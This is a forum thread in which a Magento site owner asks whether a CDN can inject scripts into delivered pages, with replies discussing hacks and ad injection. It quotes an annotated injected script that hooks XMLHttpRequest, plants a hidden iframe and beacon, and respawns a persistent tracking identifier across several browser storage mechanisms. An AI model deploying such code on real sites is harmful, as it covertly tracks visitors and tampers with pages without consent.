Can/do CDNs inject code into the HTML?

lthames
I have an odd question . . . I'm just trying to theorize something.

I had a client set up ONE of the stores of his Magento installation using some type of content delivery network.  I'm not sure of the provider, but the host he is pointing to is hisdomain.com.adn.fblcloud.net

Yesterday, a few days after he set it up,  his site slowed to a crawl ONLY for the one store.  His other 2 stores were working fine.  They share all code and all products, just different themes.

Upon researching, we found that the following code had been inserted into every page of the site. However, after searching with grep and also downloading the entire app and searching for changed files, we couldn't find anything with code that looked familiar. I also checked all of the CMS pages, blocks, category design and layout settings, etc.

This morning it is magically fixed. And my tech said it shouldn't have been the CDN . . . but he scanned our server and found nothing (he's my security/PCI expert, so hopefully he wouldn't miss something).

I'm trying to figure out if the CDN COULD be injecting script code into the HTML as it is delivered . . . and if so, is this a problem to be concerned with in the future?

Here is the code -
<body class=" catalog-category-view categorypath-headsets-bluetooth-html category-bluetooth"><!-- NOTE(review): everything from here to the end of the second script element is the payload that appeared in every page of the CDN-served store. It is quoted as evidence and kept byte for byte; only comments have been added. --><div style='display:none' id='sbbhscc'></div><script type="text/javascript">/* sbbvscc: HTML that the last block writes into #sbbhscc via innerHTML (empty in this capture, but whoever serves the page controls what lands there). sbbgscc: source text of a genPid() that returns "IE" (char codes 73 and 69); it is unescaped and document.write()-ed at the end of the second script. */sbbvscc=''; sbbgscc='; function genPid() {return String.fromCharCode(73)+String.fromCharCode(69); }';</script><!-- Off-screen 1px container that receives the beacon img and the hidden iframe appended by addmg() and sbbls() below. --><div id='sbbfrcc' style='position: absolute; top: -10px; left: 30px; font-size:1px'></div><script type="text/javascript">/* Page-wide hook on XMLHttpRequest.prototype.open/send: open() stores the request URL's hostname on the XHR object (the parser.href self-assignment is presumably an old-IE workaround for relative URLs; not confirmed), and send() adds the header X-MOD-SBB-CTYPE: xhr whenever that hostname equals location.hostname, so same-origin XHRs are tagged and cross-origin ones are not. Presumably consumed by a server-side component to tell XHR from navigations; not visible here. */(function(XHR) { var open = XHR.prototype.open; var send = XHR.prototype.send; var parser = document.createElement('a'); XHR.prototype.open = function(method, url, async, user, pass) { parser.href = url; if (parser.host == '') parser.href = parser.href; this.ajax_hostname = parser.hostname; open.call(this, method, url, async, user, pass); }; XHR.prototype.send = function(data) { if (location.hostname == this.ajax_hostname) this.setRequestHeader("X-MOD-SBB-CTYPE", "xhr"); send.call(this, data); } })(XMLHttpRequest); /* sbbgc: returns the value of cookie check_name from document.cookie, or '' when it is not set. */function sbbgc( check_name ) { var start=document.cookie.indexOf(check_name+"="); var oVal=''; var len=start+check_name.length+1; if((!start)&&(document.cookie.substring(0,check_name.length)!=check_name)){ oVal=''; } else if(start==-1){ oVal=''; } else { var end=document.cookie.indexOf(';',len); if(end==-1)end=document.cookie.length; var oVal=document.cookie.substring(len,end); }; return oVal; } /* addmg: appends a hidden IMG to #sbbfrcc whose src is the same-origin beacon /sbbi/?sbbpg=<inm>[&<ext>] (port appended only when set and not 80). */function addmg(inm,ext){ var primgobj = document.createElement ('IMG'); primgobj.src = window.location.protocol + "//" + window.location.hostname + (window.location.port && window.location.port!=80 ? 
':' + window.location.port: '')+"/sbbi/?sbbpg="+inm+(ext?"&"+ext:""); var sbbDiv = document.getElementById('sbbfrcc'); sbbDiv.appendChild (primgobj); }; /* addprid: appends escape(prid) to the PRLST cookie ('/'-separated, no duplicates, at most 5 entries). The cookie domain is hard-coded to .nationalwireless.com, i.e. this script was generated for this specific site. */function addprid(prid){ var oldVal=sbbgc("PRLST"); if((oldVal.indexOf(prid)==-1)&&(oldVal.split('/').length<5)){ if(oldVal!='')oldVal+='/'; document.cookie='PRLST='+oldVal+escape(prid)+'; path=/; domain=.nationalwireless.com'; } } /* sbbeccf: constructor bundling several client-side storage backends; every property whose .name is "sbbrf" is treated as a backend by sbbsv/sbbgv further down. sp3, sf1/sf2/sf4, strrp and strgt are not referenced anywhere else in this listing. */var sbbeccf = function () { this.sp3 = "jass"; this.sf1 = function (vd) { return sf2(vd)+32; }; var sf2 = function (avd) { return avd*12; }; this.sf4 = function (yavd) { return yavd+2; }; var strrp = function (str, key, value) { if (str.indexOf('&' + key + '=') > -1 || str.indexOf(key + '=') == 0) { var idx = str.indexOf('&' + key + '='); if (idx == -1) idx = str.indexOf(key + '='); var end = str.indexOf('&', idx + 1); var newstr; if (end != -1) newstr = str.substr(0, idx) + str.substr(end + (idx ? 0 : 1)) + '&' + key + '=' + value; else newstr = str.substr(0, idx) + '&' + key + '=' + value; return newstr; } else return str + '&' + key + '=' + value; }; var strgt = function(name, text) { if (typeof text != 'string') return ""; var nameEQ = name + "="; var ca = text.split(/[;&]/); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return ""; }; /* Backend 1: IE-only persistence via the proprietary userData behavior attached to #sbbfrcc; f(name) reads, f(name, value) writes. Errors are swallowed. */this.sfecud = { f:function(name, value) { var fv=""; try { var elm = document.getElementById('sbbfrcc'); elm.style.behavior = "url(#default#userData)"; if (typeof(value) != "undefined") { elm.setAttribute(name, value); elm.save(name); } else { elm.load(name); fv=elm.getAttribute(name); } } catch(e) { } return fv; }, name:"sbbrf" }; /* Backend 2: the old Firefox globalStorage, keyed by the current host with a leading "www." stripped. */this.sfecgs = { sbbgh:function() { var domain = document.location.host; if (domain.indexOf('www.') == 0) domain = domain.replace('www.', ''); return domain; }, f:function(name, value) { var fv=""; if (window.globalStorage) { var host = this.sbbgh(); try { if (typeof(value) != "undefined") 
globalStorage[host][name] = value; else { fv=globalStorage[host][name]; if (typeof (fv.toString)!="undefined") fv=fv.toString(); } } catch(e) { } } return fv; }, name:"sbbrf" }; /* Backend 3: localStorage. */this.sfecls = { f:function(name, value) { var fv=""; try { if (window.localStorage) { if (typeof(value) != "undefined") localStorage.setItem(name, value); else { fv=localStorage.getItem(name); if (typeof (fv.toString)!="undefined") fv=fv.toString(); } } } catch (e) { } return fv; }, name:"sbbrf" }; /* sbbcv: validates a stored token. "A-<v>-..." or "D-<v>-..." is reduced to its second segment; any other dashed prefix yields "". Null-ish values, the literal strings "falseImgUT"/"undefined"/"null", and anything that changes under encodeURI yield ""; values longer than 20 chars must start with "h4". */this.sbbcv = function (invl) { try { var invalArr = invl.split("-"); if (invalArr.length>1) { if (invalArr[0]=="A"||invalArr[0]=="D") { invl=invalArr[1]; } else invl=""; } if (invl==null||typeof(invl)=="undefined"||invl=="falseImgUT"||invl=="undefined"||invl=="null"||invl!=encodeURI(invl)) invl=""; if (typeof(invl).toLowerCase()=="string") if (invl.length>20) if (invl.substr(0,2)!="h4") invl=""; } catch (ex) { invl=""; } return invl; }; /* sbbsv: writes fv under the key "altutgv2" to every backend above and to the cookie UTGv2 (expires 31 Dec 2030, domain .nationalwireless.com), so the identifier survives clearing any single store. */this.sbbsv = function (fv) { for (var elm in this) { if (this[elm].name=="sbbrf") { this[elm].f("altutgv2",fv); } } document.cookie = "UTGv2="+fv+'; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/; domain=.nationalwireless.com'; }; /* sbbgv: reads "altutgv2" from every backend, validates each with sbbcv and keeps the most frequent value, falling back to the UTGv2 cookie. A non-empty result is re-written to all stores via sbbsv and returned; when nothing is found, the hard-coded default token below is stored instead (its middle segment, after sbbcv) and "" is returned. */this.sbbgv = function() { var valArr=Array(); var currVal=""; for (var elm in this) { if (this[elm].name=="sbbrf") { currVal = this[elm].f("altutgv2"); currVal = this.sbbcv(currVal); if (currVal!="") valArr[currVal]=(typeof(valArr[currVal])!="undefined"?valArr[currVal]+1:1); } } var lb=0; var fv=""; for (var val in valArr) { if (valArr[val]>lb) { fv = val; lb=valArr[val] } } if (fv=="") fv=sbbgc("UTGv2"); fv = this.sbbcv(fv); if (fv!="") this.sbbsv (fv); else this.sbbsv("A-h47ad0fb8bb49ce11021b482c7aec048d173-91a2a4a78a51a121a40a77a9a86a77a4a22a83a74a0a5a5a"); return fv; }; }; /* m2vr: interleaves the characters of m1 and m2 position by position; once one string runs out its slots are filled with random letters from "ghijklmnopqrstuvwyz" (Math.random, so the output is not reproducible). */function m2vr(m1,m2) { var i=0; var rc=""; var est = "ghijklmnopqrstuvwyz"; var rnum; var rpl; var charm1 = m1.charAt(i); var charm2 = m2.charAt(i); while (charm1!=""||charm2!="") { rnum = Math.floor(Math.random() * est.length); rpl = est.substring(rnum,rnum+1); rc 
+=(charm1==""?rpl:charm1)+(charm2==""?rpl:charm2); i++; charm1 = m1.charAt(i); charm2 = m2.charAt(i); } return rc; } /* sbbls: recovers the persistent id through new sbbeccf().sbbgv() (sbbeccfi and sbbgs are assigned without var, i.e. as globals); if it differs from the raw UTGv2 cookie, is non-empty and sbbfcr is still undefined, fires the utMedia beacon with the id interleaved into a fixed 32-hex-char string. It then appends a hidden same-origin IFRAME /sbbi/?sbbpg=sbbShell&gprid=<prid> to #sbbfrcc (document.all branch is the IE sizing). Any error is shown with alert(). */function sbbls(prid) { try { var eut = sbbgc("UTGv2"); sbbeccfi = new sbbeccf(); sbbgs=sbbeccfi.sbbgv(); if (eut!=sbbgs && sbbgs!="" && typeof(sbbfcr)=="undefined") { addmg('utMedia',"vii="+m2vr("08e1427711c978193f5319ad2f0452fc",sbbgs)); } var sbbiframeObj = document.createElement ('IFRAME'); var dfx=new Date(); sbbiframeObj.id = 'SBBCrossIframe'; sbbiframeObj.style.border='0px'; if (document.all) { sbbiframeObj.style.position='absolute'; sbbiframeObj.style.top='-1px'; sbbiframeObj.style.height='1px'; sbbiframeObj.style.width='28px'; } else { sbbiframeObj.style.height='1px'; sbbiframeObj.style.width='0px'; } sbbiframeObj.scrolling="NO"; sbbiframeObj.src = window.location.protocol + "//" + window.location.hostname + (window.location.port && window.location.port!=80 ? ':' + window.location.port: '')+'/sbbi/?sbbpg=sbbShell&gprid='+prid+''; var sbbDiv = document.getElementById('sbbfrcc'); sbbDiv.appendChild (sbbiframeObj); } catch (ex) { alert (ex.message); } } /* Entry point. Strips optional HTML-comment wrappers from the two strings set in the first script block and unescapes them: the first is written into #sbbhscc as HTML, the second (genPid source) is kept in the global x; on failure x becomes a genPid that returns "jser". Then, unless window.gprid already exists, document.write()s a script that defines genPid, stores its result in the PRLST cookie via addprid, sets sbbfcr=true and calls sbbls(gprid). Because sbbfcr is set before sbbls runs, the utMedia beacon inside sbbls is skipped on this path. If even that fails, addprid("dwer") is recorded. */try{ y=unescape(sbbvscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,'')); document.getElementById('sbbhscc').innerHTML=y; x=unescape(sbbgscc.replace(/^<\!\-\-\s*|\s*\-\->$/g,'')); } catch(e){ x='function genPid() {return "jser"; }'; } try { if (window.gprid==undefined) document.write('<'+'script type="text/javascri'+'pt">'+x+"var gprid=genPid(); addprid(gprid);  sbbfcr=true;sbbls(gprid);<"+"/script>"); } catch (e) { addprid("dwer"); } </script>



Thanks for any information you can give me!
Commented:
Looks suspiciously like someone has hacked the site, which is unusual for Magento.
It's unlikely the CDN was hacked, but it's not beyond the realm of possibility.

Check that your plugins are all up to date.
What version of Magento are you on?

Author

Commented:
They are on 1.72 . . . but if Magento had been hacked, it wouldn't have been just the one store, and it wouldn't have gone away without anyone doing anything on the 'real' server (and I am 100% sure nothing was done on the real server).

Author

Commented:
Something I didn't mention: the script created a bunch of results in Google -
https://www.google.ca/search?q=sbbi%2F%25253Fsbbpg%3DsbbShell%26gprid%3D%27%2Bprid%2B%27&oq=sbbi%2F%25253Fsbbpg%3DsbbShell%26gprid%3D%27%2Bprid%2B%27&aqs=chrome..69i57j69i58.263j0j4&client=ubuntu-browser&sourceid=chrome&espv=2&es_sm=94&ie=UTF-8#filter=0&q=/sbbi/%3Fsbbpg%3DsbbShell&start=20

Yesterday, clicking on any of the results went to a blank page (which you can see when looking at the cached copy). Today, clicking on any of the results goes to the real site's "Oops, page not found" page.

Author

Commented:
One other additional piece of information . . . there was no /sbbi/ folder on the real server yesterday either, which suggests those requests were being answered somewhere in front of the origin server rather than by it.
Dave Baldwin (Fixer of Problems)
Commented:
The basic answer to your question is Yes, it is possible.  Some 'Free' hosting services put ads in the pages they deliver.  That code also looks vaguely like spam advertising code or even virus download code.

Commented:
What plugins are you using, if any? Did you check that they were all up to date?

Author

Commented:
They use several extensions and not all are up to date.  They need to upgrade to 1.9 and updated extensions . . . but he's been putting it off.

However, all stores use the same extensions, but only the one store on the CDN had the issue. And an out-of-date extension surely wouldn't be a problem yesterday and not today, with no intervention.

The client hasn't questioned what happened . . . so I'm really just curious.

Commented:
What are they using the CDN for? Images, JS, CSS?

Author

Commented:
Their site was not hacked . . . I never got an answer, but within a couple of hours after I told the client to check with the consultant who set up the CDN, everything was back to normal.

My inquiries to find out what it was were not answered :(
